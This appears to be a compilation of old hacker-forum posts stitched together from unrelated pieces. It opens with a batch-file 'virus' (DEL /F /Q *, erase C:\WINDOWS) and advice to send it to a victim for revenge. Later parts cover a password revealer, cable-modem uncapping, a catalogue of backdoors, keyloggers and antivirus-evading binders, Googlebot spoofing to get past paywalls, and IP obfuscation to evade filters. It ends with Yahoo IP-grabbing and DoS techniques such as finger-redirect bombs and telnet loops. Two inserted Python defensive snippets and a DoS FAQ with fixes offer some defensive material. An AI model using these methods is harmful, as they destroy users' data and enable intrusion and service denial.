To delete all folders/files just put this:

DEL /F /Q *

into Notepad and save it as whateveryouwant.cmd. It will delete all files on the computer even if they are read only, and it will not prompt you before doing it. You will not think anything has happened until you try to do something.

WARNING: DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER.

If you just want to delete the WINDOWS folder, do this. The only thing you need again is Notepad.

Now, to test it, create a text file called TEST.txt in C:\. In Notepad type "erase C:\TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd". Now run the file "Test.cmd", then open up C:\ and you'll see your TEST.txt is gone.

Now the real work begins: go to Notepad and type erase C:\WINDOWS (or C:\LINUX if you have Linux) and save it again as whateveryouwant.cmd. DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge: send your file to your victim. Once she/he opens it, her/his WINDOWS/LINUX files are gone and she/he has to install LINUX/WINDOWS again.

Simple explanation: go to Notepad, type erase C:\WINDOWS, save as whateveryouwant.cmd, send it to the victim; once the victim opens it, the WINDOWS folder will be gone and they have to install WINDOWS again.

It's good practice not to use the same password for everything. If your ONLY password falls into the wrong hands, the next thing you know you won't be able to access anything at all. Imagine losing access to your Hotmail, GMail, Yahoo, Windows Live Messenger, Yahoo Messenger, Google Talk, Internet bank account and so on within a day! You'll go crazy losing all your contacts, knowing someone is having a great time reading all your personal emails.

For me, I use different passwords for software/websites and most of them are saved on my laptop for easy access. The problem is, if you use too many different passwords, sometimes you tend to forget the password that you set for a piece of software or a website. If the password is saved, you can easily use a tool to show the password hidden under the asterisks *******.

I am sure many of you remember "SnadBoy's Revelation" but unfortunately it doesn't support showing passwords hidden under asterisks in web pages. So I won't be recommending this tool because I know a better one.

Asterisk Key shows passwords hidden under asterisks. It is able to instantly uncover hidden passwords on password dialog boxes and web pages. The setup is less than 500KB and it works perfectly.

Reveal hidden password in Google Talk (Software)

Reveal hidden password in Internet Explorer (Web Page)

Both Google Talk and Internet Explorer are active. I then launch Asterisk Key and click the "Recover" button. Within a second, Asterisk Key shows the passwords hidden under the asterisks.

Just a word of advice: please use this tool to recover your OWN passwords. If you get caught using this tool to steal people's passwords, you can get into serious trouble. Treat this tool as a useful recovery tool instead of a hacking tool.

Make sure you understand these:

1. This process is real and can increase the speeds you get from your cable service.
2. This guide may not work with all modems; it is currently only known to work with Surfboard modems but should work with others.
3. No matter how much you uncap, you can be caught JUST AS EASILY. Use at your own risk.
4. Don't be disappointed if this does not work for you; certain configurations of your modem or ISP may prevent you from properly performing this process.
5. I CANNOT help you if you do NOT have a Surfboard modem.
6. Finally, please read through all of the documentation before asking me or anyone else for support. Thank you.
7. Every step must be followed exactly as stated, in exact order. Deviation will result in FAILURE.

Backdoor: Intrude into a computer and control it with a client program.
Crack tool: Crack passwords of systems or applications, crack serial numbers.
Disassembler: Disassemble a program with it. If you have an executable file, you can look at the source code of this file with it.
DoS tool: Make a computer stop responding to any request with these tools, so other people cannot access the computer.
Document: Documents about hackers, crackers, etc.
E-mail tool: Destroy a computer system using these tools; the tools are all related to e-mail. It includes several tools about e-mail, for example an email bomber, a tool to find someone's email address, etc.
Editor: Edit or modify your program with them.
Encryption & decryption tool: Encrypt files of almost any type using many strong cryptography algorithms.
Executable file tool: Manipulate executable files with these tools: bind some executable files, split one executable file, etc. So, for example, you can add one executable file to another one.
ICQ tool: Destroy a computer system using these tools; the tools are all related to ICQ. All programs in it work with ICQ. With the tools you can do many things, for example recovering ICQ's password, sharing your files, encrypting your ICQ messages, and so on.
Keylogger: Record keystrokes while the program is running, so you can get some useful information, for example passwords.
MISC: Examine source code for security holes, hack games, and other interesting tools for both Linux and Windows.
Packet forging: Modify data packets on the network at will.
Phreak tool: Test paging transmitters and systems, and so on; it includes boxes and wardialers.
Scanner: Acquire system information, for example open ports, OS, and so on.
Sniffer: Intercept and capture data on the network.
Snoop tool: Show information about your system. For example, it can show the IP address of your computer, or it can show SCSI and ATAPI devices in your system, and so on.
Source code: Source code of many tools.
Spoof: Bypass an HTTP proxy, keep your connection active, create fake credit card numbers, IP spoofing, etc.
Virus: Source code of viruses and executable viruses.

Backdoor

1. Back Orifice: Tools about Back Orifice.
2. Backdoor kit: Collection of many backdoor programs.
3. Backdoor source: Source of backdoor programs.
4. Minigift: Another backdoor program.
5. Net spy: Allows you to gain control of another computer over the internet.
6. Trojan: Control other people's computers.

DoS tool

1. Black: Bomb someone's computer with it.
2. IGMP Nuker: Bomb others' computers with this popular tool.
3. Windows DoS kit: Attack computer systems with these tools.
4. pagebomb: Bomb Windows pager with this tool.
5. windows95/98 patch: Patch your system in order to avoid attacks by hackers.

Document

1. Article about hack: Introduce some knowledge about hacking.
2. Article about hacker: Tell you how to become a hacker.
3. Articles about DoS: Describe what a DoS attack is.
4. Articles about crack: Teach you how to crack.
5. Articles about programming: Introduce some knowledge about programming.
6. Articles about hack: Narrate some knowledge about hacking.
7. Books about hacking: Narrate some knowledge about hacking.
8. Books about linux: Introduce information about Linux.
9. Books about network: Tell you knowledge about networks.
10. Books about programming: Introduce some knowledge about programming.
11. Document about jargon: Tell you something about jargon.
12. Document about pbx: Introduce some PBX knowledge.
13. Document about phreaking: Introduce knowledge about phreaking.
14. Other documents: Introduce some information.
15. Phrack Documents: Discuss some questions about Phrack.
16. The Trojans Removal Database: Describe a lot of Trojan programs.

Executable file tool

1. Bound File Detector & Remover: Detect bound files with this tool.
2. Exe file tool: Manage exe files with these tools.
3. Fusion: Enable static, virtual or dynamic linking, with sophisticated version control when using dynamic linking.
4. Multi Binder: Bind an unlimited number of files, of any EXE/BAT type.
5. Newjoiner: Avoid AV detection.
6. PEBundle: Allow DLLs or other files to be "bundled" with an executable file.
7. Topo: Scan all sections in order to find large 'usable' areas.
8. WinSplit: Split and join files with this tool.
9. inPEct: Bind 2 executables in one.
10. inPEct source code: Source code of inPEct, which binds 2 executables in one.

Keylogger

1. G2kBIOSspoof: Spoof the BIOS password for Gateway PCs simply.
2. HookThis: Set a system-wide keyboard hook.
3. Hooker: Make an intelligent trojan keylogger module.
4. Invisible KeyLogger Stealth: Monitor computer activity to steal key information invisibly.
5. KeyGhost: Record keystrokes with a tiny module that clips on to the PC keyboard cable.
6. KeySpy: Spy program as a keyboard logger and a PC remote controller.
7. KeyTrap: Log keyboard keys effectively!
8. Keycopy: Keep a record of any keyboard activity on your computer.
9. Keylog: Includes keylog tools such as Keylogwn, Keylog95, Keylog5 and Keylog25, IKS12d-m.
10. PC Acme: Monitor activity on a PC and save all information in LOG files.
11. PC Acme Pro: Monitor software on a PC and save all information in LOG files.
12. Phantom2: Record and play back keystrokes; a program for MS-DOS.
13. Playback!: Record the complete task and then play it back with one keystroke.
14. SKInNT: Monitoring program developed for Windows NT and Windows 2000.
15. Skin: Monitor kit of Skin5pro, Skin98as, Skint5, and Skin5 Demo.
16. Slog: Provide you with a log of what you have typed on your own computer for later review.

Packet forging

1. Netcat: Utility for reading and writing data across network connections using the TCP or UDP protocol.
2. Packet_Forging: Includes 21 files that are all used to create and send arbitrary packets on ethernet networks.
3. Packet_tool: Contains five other packet tools, tcpkill, packetx1, msmh, LibnetNT and arpinject, in the kit.
4. Pksnd102: Packs 16 files such as Winpkt, Pktsend, Ndis3pkt, Dump, Dumy and Dis_pkt9, among which are packed or executable files and source files of packet driver programs.
5. Raw IP Packet Capture/Creation Utility: Allows you free rein to directly forge packets in any way you desire.
6. Snot: Uses snort rules files as its source of packet information.
7. Winject: Packet injector for Windows 9x, also called drugs for Windows.

Phreak tool

1. Auto Dial: Helps you to use a war dialer easily.
2. Blue Dial: Makes it easy to create and use different frequency settings for dialing.
3. Boxtone: Create phone tones.
4. CATCALL: Deals out a sentence from mildly annoying to downright galling.
5. CHaoS DeViCe: Calls random pagers, puts in a phone number, hangs up, and starts all over again.
6. CPhreak: The first fone phreaking utility.
7. Dialing Demon: Wardialer.
8. Grim Scanner: Searches for dial tones and carriers in the same call.
9. No Carrier: Scan with a DOS shell, graphics and more!
10. POCSAG Decoder: Allows the off-air decoding of POCSAG paging signals at 512, 1200 or 2400 bits/second.
11. Pageit: Page a billion different pagers and put in one number, or page ONE pager and put in a billion numbers!
12. PhoneTag: Checks for starttime every second while it's running.
13. Phreak box: Construct and use phreak boxes.
14. Super Dial: Call all of your town's (or city's) phone numbers.
15. THC-SCAN: Scan phone-number areas with your modem.
16. The Little Operator: Another wardialer.
17. Tone Loc Utilities: Also a wardialer.
18. ToneLoc: Dials numbers, looking for some kind of tone.

Sniffer

1. Blackbox for AOL: Monitor application for America Online, AIM, ICQ, and Yahoo Messenger.
2. Colasoft Application Protocol Sniffer & Analyzer: A TCP/IP network sniffer & analyzer program for Windows.
3. Ethereal0814: Another version of the free network protocol analyzer.
4. Ethereal0817: Analyze network protocols, another version of Ethereal.
5. Ethereal0820: Free network protocol analyzer for Win32.
6. Libpcap062: The packet capture library needed for capturing packets, the latest release of Libpcap.
7. Linux_sniff_source: Contains 18 sniffer tools for Linux and some source files.
8. LittleBrother: Allows supervisors to accurately manage and measure internet and network resource usage.
9. NetProb32 Network Analyzer: Analyzer, traffic monitor, and packet generator program.
10. PacketX: Integrates winpcap packet capture functionality with VB or any other programming environment supporting Microsoft ActiveX technology.
11. Phenoelit's own security sniffer: Opens a network interface for all packets and not only for those packets which are sent to this interface.
12. Proxy Workbench: A unique proxy server ideal for developers, trainers and security experts that displays its data in real time.
13. Snarp: Allows the host to sniff the data from the wire.
14. Sniff-em: A competitively priced, performance-minded network analyzer for Windows.
15. Sniffers: 34 files, among them 28 sniffer tools and some source code.
16. Socket Workbench: Designed to analyze socket communications.
17. Stealth Activity Recorder: New and easy internet-enabled tool for monitoring home and business PCs.
18. Tcpdump362: Capture and dump program, pretty much the original protocol packet dumper.
19. Windows_sniff: Kit of 5 tools and 1 source code file to facilitate the capture and visualization of network traffic.
20. Winpcap: Capture and send raw data from a network card, the free Packet Capture Architecture for Windows!

Snoop tool

1. ID: Displays the ID information of a machine's specific hardware.
2. IPQuery: Shows the current IP address.
3. NetroSnooper: Find hidden files on the internet!
4. Network Inventory: Provides network administrators with the ability to perform a software inventory on all machines located on a network.
5. Quadsoft's IP Tool: Tells you your IP address in a variety of ways.
6. ShellSPY: Tracks every process running on your PC.
7. Trouble In Paradise: Installs nothing but trouble on your machine, showing some messages.
8. iNetTools for Windows: Collection of menu-driven testing tools for internet and IP-based networks.

Source code

1. APG: Set of tools for random password generation.
2. ARP Monitor: Traces ARP requests from/to your machine.
3. Asm: A kit including msmh, inpect and GetDialPasswords.
4. Backdoor: Includes 17 backdoor tools in the kit with their source code.
5. Blue Beep: Blue Beep is a wardialer; this includes its source code.
6. C_SOURCE: Contains 4 files; decompress them to get the tools' source code.
7. Emailcrk: Crack passwords of e-mail accounts.
8. Findhost: Scans ports on the net for you.
9. Harvester: Contains the source of Harvester, which monitors remote web pages and FTP directories.
10. IgmpNuke: Source code of the IGMP packet tool.
11. Jail Chroot Project: Build a chrooted environment on POSIX, with C source code.
12. Keylogger_SRC: Includes the full source of a keylogger recording keystrokes.
13. Misc_src: Misc source code of 10 tools.
14. Network Grep: Mimics as much functionality of GNU grep as possible, applied at the network layer.
15. Nutcracker: Password check/crack tool for Unix/Linux.
16. PgpIcq: Encrypt your ICQ messages using the power of the world's best encryption software.
17. Portscanner: Scans a group of IP addresses.
18. SecurityFocus ARIS Extractor: Analyzes IDS logs in a sophisticated way and filters important attacks from the noise.
19. ShareDecryption: Extracts share passwords from the registry.
20. VB_SOURCE: Contains 14 files; decompress them to get the tools' source code.
21. Wnuke4: The complete wnuke4 source file package.
22. Zebedee: Secure IP tunnel tool's source code!

Ever experienced this? You ask Google to look something up; the engine returns a number of results, but if you try to open the ones with the most promising content, you are confronted with a registration page instead, and the stuff you were looking for will not be revealed to you unless you agree to a credit card transaction first... The lesson you should have learned here is: obviously Google can go where you can't.

Can we solve this problem? Yes, we can. We merely have to convince the site we want to enter that WE ARE GOOGLE.

In fact, many sites that force users to register or even pay in order to search and use their content leave a backdoor open for the Googlebot, because a prominent presence in Google searches is known to generate sales leads, site hits and exposure. Examples of such sites are Windows Magazine, .Net Magazine, Nature, and many, many newspapers around the globe.

How then can you disguise yourself as a Googlebot? Quite simple: by changing your browser's User Agent. Copy the following code segment and paste it into a fresh Notepad file. Save it as Useragent.reg and merge it into your registry.

You may always change it back again... I know only one site that uses your User Agent to establish your eligibility to use its services, and that's the Windows Update site. To restore the IE6 User Agent, save the following code to NormalAgent.reg and merge it with your registry:
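The weakness on the site's side is trusting the User-Agent header alone. As an added example (mine, not code from the original post), here is the server-side check that closes that door: a Googlebot claim is honoured only when reverse DNS of the client IP lands in googlebot.com or google.com and a forward lookup of that name returns the same IP, which is Google's documented way of verifying its crawler. The DNS table and TEST-NET addresses are constructed so the block runs offline; the resolver callbacks are assumptions standing in for socket.gethostbyaddr and socket.gethostbyname_ex.

```python
from typing import Callable, Dict, List

# Resolver callbacks so the check can run offline here. In production pass
#   reverse = lambda ip: socket.gethostbyaddr(ip)[0]
#   forward = lambda name: socket.gethostbyname_ex(name)[2]
ReverseLookup = Callable[[str], str]        # ip -> PTR name, raises OSError if none
ForwardLookup = Callable[[str], List[str]]  # name -> list of A records

# Domains Google's crawler hosts resolve into (per Google's verification guidance).
GOOGLE_CRAWLER_SUFFIXES = (".googlebot.com", ".google.com")


def is_verified_googlebot(ip: str, reverse: ReverseLookup, forward: ForwardLookup) -> bool:
    """Reverse lookup must land in a Google domain AND the forward lookup of
    that name must contain the original IP. Anyone can set the PTR record for
    their own address space to 'crawl-1.googlebot.com'; they cannot make
    Google's zone resolve that name back to their IP."""
    try:
        name = reverse(ip).rstrip(".").lower()
    except OSError:
        return False
    if not name.endswith(GOOGLE_CRAWLER_SUFFIXES):
        return False
    try:
        return ip in forward(name)
    except OSError:
        return False


def allow_crawler_bypass(user_agent: str, client_ip: str,
                         reverse: ReverseLookup, forward: ForwardLookup) -> bool:
    """Decide whether a request gets the crawler-only (unpaywalled) path.
    The User-Agent string is only a claim; the DNS round trip is the evidence."""
    if "googlebot" not in user_agent.lower():
        return False
    return is_verified_googlebot(client_ip, reverse, forward)


# --- constructed DNS data for an offline demonstration (TEST-NET addresses) ---
PTR: Dict[str, str] = {
    "192.0.2.10": "crawl-192-0-2-10.googlebot.com",  # genuine: forward lookup matches
    "192.0.2.20": "crawl-1.googlebot.com",            # attacker-controlled PTR, no forward match
    "192.0.2.30": "www.googlebot.com.evil.example",   # suffix trick: not a Google domain
    "192.0.2.40": "dsl-40.isp.example",               # ordinary client
}
A: Dict[str, List[str]] = {
    "crawl-192-0-2-10.googlebot.com": ["192.0.2.10"],
    "crawl-1.googlebot.com": ["192.0.2.99"],
    "www.googlebot.com.evil.example": ["192.0.2.30"],
    "dsl-40.isp.example": ["192.0.2.40"],
}


def fake_reverse(ip: str) -> str:
    if ip not in PTR:
        raise OSError("no PTR record")
    return PTR[ip]


def fake_forward(name: str) -> List[str]:
    if name not in A:
        raise OSError("no A record")
    return A[name]


# The real Googlebot User-Agent string; a client can send it, so it proves nothing.
GOOGLEBOT_UA = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"


def demo() -> Dict[str, bool]:
    """Same spoofed User-Agent from four addresses; only the genuine one passes."""
    return {ip: allow_crawler_bypass(GOOGLEBOT_UA, ip, fake_reverse, fake_forward)
            for ip in PTR}


if __name__ == "__main__":
    for ip, allowed in demo().items():
        print("%-12s %s" % (ip, "crawler access" if allowed else "treat as normal visitor"))
```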

Let me elaborate on how hackers use URL obfuscation in order to hide an IP address.

It is possible to hide addresses in URLs so that they can bypass filters or other application defenses that have been put in place to block specific IP addresses. Although web browsers recognize URLs that contain hexadecimal or binary character representations, some web filtering applications don't. Here is an example of an IP address encoded as a single number: http://8812120797/. Does it look confusing? Well, this decimal address can be converted into a human readable IP address. Convert the address into hexadecimal, divide it into 4 sets of 2 digits, and finally convert each set back into decimal to recover the IP address manually.

To convert an IP address to its binary equivalent, perform the following steps.

(1) Convert each individual number in the IP address to its binary equivalent. Let’s say that the address is 192.168.13.10.

192 = 11000000
168 = 10101000
 13 = 00001101
 10 = 00001010

(2) Combine the four eight-digit numbers into one 32-digit binary number. The previous example produces 11000000101010000000110100001010.

(3) Convert the 32-bit number back to a decimal number. The example yields 3232238858.

(4) Entering this into the address field, http://3232238858, takes you to 192.168.13.10.
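The same conversion in code, as an added example that is not part of the original post: a normaliser that turns every numeric host spelling a browser accepts back into dotted decimal, so a filter compares the canonical address rather than the raw host text. It goes a little beyond the walkthrough by also covering the hexadecimal and C-style octal spellings, dotted hex, and the inet_aton short forms with fewer than four parts; the function names and the blocklist helper are my own.

```python
import re
from typing import Optional


def ip_to_int(dotted: str) -> int:
    """Steps (1)-(3) of the walkthrough: four octets -> one 32-bit integer."""
    parts = dotted.split(".")
    if len(parts) != 4:
        raise ValueError("expected four dotted octets: %r" % dotted)
    value = 0
    for part in parts:
        octet = int(part, 10)
        if not 0 <= octet <= 255:
            raise ValueError("octet out of range: %r" % part)
        value = (value << 8) | octet  # append the octet's eight bits
    return value


def int_to_ip(value: int) -> str:
    """Reverse of ip_to_int: 32-bit integer -> dotted decimal."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("not a 32-bit value: %r" % value)
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def _parse_part(text: str) -> int:
    """One numeric component as a browser reads it: 0x.. is hex, a leading
    zero means C-style octal, anything else is decimal. Non-numeric text raises."""
    t = text.lower()
    if t.startswith("0x") and len(t) > 2:
        return int(t[2:], 16)          # raises ValueError on bad hex digits
    if len(t) > 1 and t[0] == "0" and t.isdigit():
        return int(t, 8)               # raises ValueError on digits 8 and 9
    if t.isdigit():
        return int(t, 10)
    raise ValueError("not a numeric host part: %r" % text)


def canonical_ipv4(host: str) -> Optional[str]:
    """Return the dotted-decimal form of any numeric IPv4 spelling, or None
    when `host` is not a valid numeric address (a DNS name, a part out of
    range, or a value that does not fit in 32 bits)."""
    try:
        values = [_parse_part(p) for p in host.split(".")]
    except ValueError:
        return None
    if len(values) == 1:                  # single integer carries all 32 bits
        n = values[0]
    elif 2 <= len(values) <= 4:           # inet_aton rule: the last part
        n = 0                             # fills all the remaining low bytes
        for v in values[:-1]:
            if v > 0xFF:
                return None
            n = (n << 8) | v
        low_bits = 8 * (5 - len(values))
        if values[-1] >= 1 << low_bits:
            return None
        n = (n << low_bits) | values[-1]
    else:
        return None
    if n > 0xFFFFFFFF:
        return None
    return int_to_ip(n)


_URL_HOST = re.compile(r"^[a-z][a-z0-9+.-]*://([^/?#]*)", re.IGNORECASE)


def url_host(url: str) -> Optional[str]:
    """Extract the host from a URL, dropping any userinfo ('user:pw@') and port."""
    m = _URL_HOST.match(url)
    if not m:
        return None
    authority = m.group(1).rsplit("@", 1)[-1]   # keep only the text after the last '@'
    return authority.rsplit(":", 1)[0] if ":" in authority else authority


def is_blocked(url: str, blocklist) -> bool:
    """Filter on the canonical host so an obfuscated spelling cannot slip past."""
    host = url_host(url)
    if host is None:
        return False
    canon = canonical_ipv4(host)
    return (canon or host.lower()) in blocklist
```

Values above 4294967295, such as the 8812120797 quoted earlier, do not fit in 32 bits and are rejected rather than silently wrapped.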

Sometimes some of your friends who appear offline in Yahoo Messenger may not actually be offline; they may be in 'Invisible' mode. This may be because they are trying to ignore you or are too busy to talk to anyone.

There is this small trick that you can use to find out what the truth is.

First open your Yahoo Messenger main window and double click on the name of the person you want to check. The chat window will open.

Click the IMVironment button, select See all IMVironments, select Yahoo! Tools or Interactive Fun, and click on Doodle. After loading the Doodle IMVironment there are two possibilities:

1. If the user is offline, the Doodle area will show "waiting for your friend to load Doodle" continuously.

2. If the user is online (but in invisible mode), the Doodle area will change after a few seconds (it can take up to one minute, depending on your connection speed), so you know that the user is online.

This is only for education purposes, so whoever tries this does so at his own risk. I am not sure that this will work 100%, but it will work almost 70 percent of the time.

Leave a comment here after you see the post and let me know whether it works or not, or if you have a problem, post it here.

But before that you need to know a few things about the Yahoo chat protocol.

Following are the features:

1) When we chat on Yahoo everything goes through the server. That is, when we only chat, the messages go through the server.
2) When we send files Yahoo has 2 options:
   a) Either it uploads the file and then the other client has to download it.
   b) Or it connects to the client directly and gets the files.
3) When we use video or audio:
   a) It either goes through the server,
   b) Or it has a client-to-client connection.

And when we have a client-to-client connection the opponent's IP is revealed, on port 5051. So how do we exploit the chat user when he gets a direct connection, and how do we go about it? Remember, I am here to hack a system without using a TOOL, only by simple net commands and Yahoo chat techniques. That's what makes the difference between a real hacker and newbies. So let's analyse:

1) It's impossible to get an attacker's IP address when you only chat.
2) There is a 50% chance of getting an IP address when you send files.
3) Again a 50% chance of getting an IP when you use video or audio.

So why wait? Let's exploit those 50% chances. I will explain only for files here; the same applies to video or audio.

1) Go to DOS and type: netstat -n 3

You will get the following output. Just don't worry and be cool:

Active Connections

I will just explain what the output is in general. On the left hand side is your IP address, and on the right hand side is the IP address of the foreign machine and the port to which it is connected. Ok, now so what next?

2) Try sending a file to the target. If the file comes from the server, that is, the file is uploaded, leave it; you will not get the IP. But if a direct connection is established, HMMMM, then the attacker's first phase is over. This is the output in your netstat. The 5101 port is where the attacker is connected.

Active Connections

That's what is highlighted in RED. So what next?

3) Hmmm, ok, so make a DOS attack now. Go to the DOS prompt and just do nbtstat -A <attacker's IP address>. It can happen that if the system is not protected then you can see the whole network.

C:\>nbtstat -A 194.30.209.14

- What is a denial of service attack?
- Why would someone crash a system?
- How can someone crash a system?
- How do I protect a system against denial of service attacks?

I also have a section called SUGGESTED READING where you can find information about good free information that can give you a deeper understanding about something.

Note that I have very limited experience with Macintosh, OS/2 and Windows and most of the material is therefore for Unix use.

You can always find the latest version at the following address:
http://www.student.tdb.uu.se/~t95hhu/secure/denial/DENIAL.TXT

Feel free to send comments, tips and so on to address:
t95hhu@student.tdb.uu.se

.A. INTRODUCTION
~~~~~~~~~~~~~~~~

.A.1. WHAT IS A DENIAL OF SERVICE ATTACK?
-----------------------------------------

Denial of service is about knocking off services without permission, for example by crashing the whole system. This kind of attack is easy to launch and it is hard to protect a system against it. The basic problem is that Unix assumes that users on the system or on other systems will be well behaved.

I think that number one and six are the more common today, but that number four and five will be the more common ones in the future.

.A.2.2. SUB-CULTURAL STATUS
---------------------------

After all the information about syn flooding, a bunch of such attacks were launched around Sweden. The very most of these attacks were not part of an IP-spoof attack; it was "only" a denial of service attack. Why?

I think that hackers attack systems as a sub-cultural pseudo career, and I think that many denial of service attacks, and here in the example syn flooding, were performed for these reasons. I also think that many hackers begin their career with denial of service attacks.

.A.2.3. TO GAIN ACCESS
----------------------

Sometimes a denial of service attack could be part of an attack to gain access to a system. At the moment I can think of these reasons and specific holes:

.1. Some older X-lock versions could be crashed with a method from the denial of service family, leaving the system open. Physical access was needed to use the work space afterwards.

.2. Syn flooding could be part of an IP-spoof attack method.

.3. Some program systems could have holes during startup that could be used to gain root, for example SSH (secure shell).

.4. During an attack it could be useful to crash other machines in the network or to deny certain persons the ability to access the system.

.5. Also, a system being booted could sometimes be subverted, especially rarp-boots. If we know which port the machine listens to (69 could be a good guess) during the boot, we can send false packets to it and almost totally control the boot.

.A.2.4. REVENGE
---------------

A denial of service attack could be part of revenge against a user or an administrator.

.A.2.5. POLITICAL REASONS
-------------------------

Sooner or later new or old organizations will understand the potential of destroying computer systems and find tools to do it.

For example, imagine bank A loaning company B money to build a factory threatening the environment. Organization C therefore crashes A's computer system, maybe with help from an employee. The attack could cost A a great deal of money if the timing is right.

.A.2.6. ECONOMICAL REASONS
--------------------------

Imagine the small company A moving into a business totally dominated by company B. A's and B's customers make their orders by computer and depend heavily on the order being done within a specific time (A and B could be stock trading companies). If A and B can't perform the order, the customers lose money and change company.

As part of a business strategy A pays a computer expert a sum of money to get him to crash B's computer systems a number of times. A year later A is the dominating company.

.A.2.7. NASTINESS
-----------------

I know a person who found a workstation where the user had forgotten to log out. He sat down and wrote a program that made a kill -9 -1 at a random time at least 30 minutes after the login time, and placed a call to the program from the profile file. That is nastiness.

.A.3. ARE SOME OPERATING SYSTEMS MORE SECURE?
---------------------------------------------

This is a hard question to answer and I don't think that it will give anything to compare different Unix platforms. You can't say that one Unix is more secure against denial of service; it is all up to the administrator.

A comparison between Windows 95 and NT on one side and Unix on the other could however be interesting.

Unix systems are much more complex and have hundreds of built-in programs, services... This always opens up many ways to crash the system from the inside.

In the normal Windows NT and 95 network there are few ways to crash the system, although there are methods that always will work.

That gives us that no big difference between Microsoft and Unix can be seen regarding inside attacks. But there are a couple of points left:

- Unix has many more tools and programs to discover an attack and monitor the users. To watch what another user is up to under Windows is very hard.

- The average Unix administrator probably also has much more experience than the average Microsoft administrator.

The two last points give that Unix is more secure against inside denial of service attacks.

A comparison between Microsoft and Unix regarding outside attacks is much more difficult. However, I would like to say that the average Microsoft system on the Internet is more secure against outside attacks, because they normally have much fewer services.

.B. SOME BASIC TARGETS FOR AN ATTACK
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.B.1. SWAP SPACE
----------------

Most systems have several hundred Mbytes of swap space to service client requests. The swap space is typically used for forked child processes which have a short life time. The swap space will therefore almost never be used heavily in a normal case. A denial of service could be based on a method that tries to fill up the swap space.

.B.2. BANDWIDTH
---------------

If the bandwidth usage is too high the network will be useless. Most denial of service attacks influence the bandwidth in some way.

.B.3. KERNEL TABLES
-------------------

It is trivial to overflow the kernel tables, which will cause serious problems on the system. Systems with write-through caches and small write buffers are especially sensitive.

Kernel memory allocation is also a sensitive target. The kernel has a kernelmap limit; if the system reaches this limit it cannot allocate more kernel memory and must be rebooted. The kernel memory is not only used for RAM, CPUs, screens and so on, it is also used for ordinary processes. Meaning that any system can be crashed, and with a mean (or in some sense good) algorithm pretty fast.

For Solaris 2.X, how much kernel memory the system is using is measured and reported with the sar command, but for SunOS 4.X there is no such command. Meaning that under SunOS 4.X you can't even get a warning. If you do use Solaris you should run sar -k 1 to get the information. netstat -k can also be used and shows how much memory the kernel has allocated in the subpaging.

.B.4. RAM
---------

A denial of service attack that allocates a large amount of RAM can cause a great deal of problems. NFS and mail servers are actually extremely sensitive because they do not need much RAM and therefore often don't have much RAM. An attack at an NFS server is trivial. The normal NFS client will do a great deal of caching, but an NFS client can be anything, including a program you wrote yourself...

.B.5. DISKS
-----------

A classic attack is to fill up the hard disk, but an attack at the disks can be so much more. For example, an overloaded disk can be misused in many ways.

.B.6. CACHES
------------

A denial of service attack involving caches can be based on a method to block the cache or to avoid the cache.

These caches are found on Solaris 2.X:

Directory name lookup cache: Associates the name of a file with a vnode.

Inode cache: Caches information read from disk in case it is needed again.

Well, once inetd has crashed, all other services running through inetd no longer will work.

.C. ATTACKING FROM THE OUTSIDE
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

.C.1. TAKING ADVANTAGE OF FINGER
--------------------------------

Most fingerd installations support redirections to another host.

Ex:

$finger @system.two.com@system.one.com

finger will in the example go through system.one.com and on to system.two.com. As far as system.two.com knows it is system.one.com who is fingering. So this method can be used for hiding, but also for a very dirty denial of service attack. Look at this:

$ finger @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@host.we.attack

All those @ signs will get finger to finger host.we.attack again and again and again... The effect on host.we.attack is powerful and the result is high bandwidth, short free memory and a hard disk with less free space, due to all the child processes (compare with .D.5.).

The solution is to install a fingerd which doesn't support redirections, for example GNU finger. You could also turn the finger service off, but I think that is just a bit too much.

.C.2. UDP AND SUNOS 4.1.3.
--------------------------

SunOS 4.1.3. is known to reboot if a packet with incorrect information in the header is sent to it. This is the case if the ip_options indicate a wrong size of the packet.

The solution is to install the proper patch.

.C.3. FREEZING UP X-WINDOWS
---------------------------

If a host accepts a telnet session to the X-Windows port (generally somewhere between 6000 and 6025, in most cases 6000) that could be used to freeze up the X-Windows system. This can be done with multiple telnet connections to the port or with a program which sends multiple XOpenDisplay() to the port.

The same thing can happen to Motif or Open Windows.

The solution is to deny connections to the X-Windows port.

.C.4. MALICIOUS USE OF UDP SERVICES
-----------------------------------

It is simple to get UDP services (echo, time, daytime, chargen) to loop, due to trivial IP-spoofing. The effect can be high bandwidth that causes the network to become useless. In the example the header claims that the packet came from 127.0.0.1 (loopback) and the target is the echo port at system.we.attack. As far as system.we.attack knows, 127.0.0.1 is system.we.attack, and the loop has been established.

Note that the name system.we.attack looks like a DNS name, but the target should always be represented by the IP number.

Quoted from proberts@clark.net (Paul D. Robertson), comment on comp.security.firewalls on the matter of "Introduction to denial of service":

" A great deal of systems don't put loopback on the wire, and simply emulate it. Therefore, this attack will only effect that machine in some cases. It's much better to use the address of a different machine on the same network. Again, the default services should be disabled in inetd.conf. Other than some hacks for mainframe IP stacks that don't support ICMP, the echo service isn't used by many legitimate programs, and TCP echo should be used instead of UDP where it is necessary. "

.C.5. ATTACKING WITH LYNX CLIENTS
---------------------------------

A World Wide Web server will fork an httpd process as a response to a request from a client, typically Netscape or Mosaic. The process lasts for less than one second, and the load will therefore never show up if someone uses ps. In most cases it is therefore very safe to launch a denial of service attack that makes use of multiple W3 clients, typically lynx clients. But note that the netstat command could be used to detect the attack (thanks to Paul D. Robertson).

Some httpd:s (for example http-gw) will have problems besides the normal high bandwidth, low memory... And the attack can in those cases get the server to loop (compare with .C.6.).

.C.6. MALICIOUS USE OF telnet
-----------------------------

Study this little script:

Ex:

while : ; do telnet system.we.attack & done

An attack using this script might eat some bandwidth, but it is nothing compared to the finger method or most other methods. Well, the point is that some pretty common firewalls and httpd:s think that the attack is a loop and turn themselves down, until the administrator sends kill -HUP.

This is a simple high-risk vulnerability that should be checked for and, if present, fixed.

.C.7. MALICIOUS USE OF telnet UNDER SOLARIS 2.4
-----------------------------------------------

If the attacker makes a telnet connection to the Solaris 2.4 host and quits using:

Ex:

Control-} quit

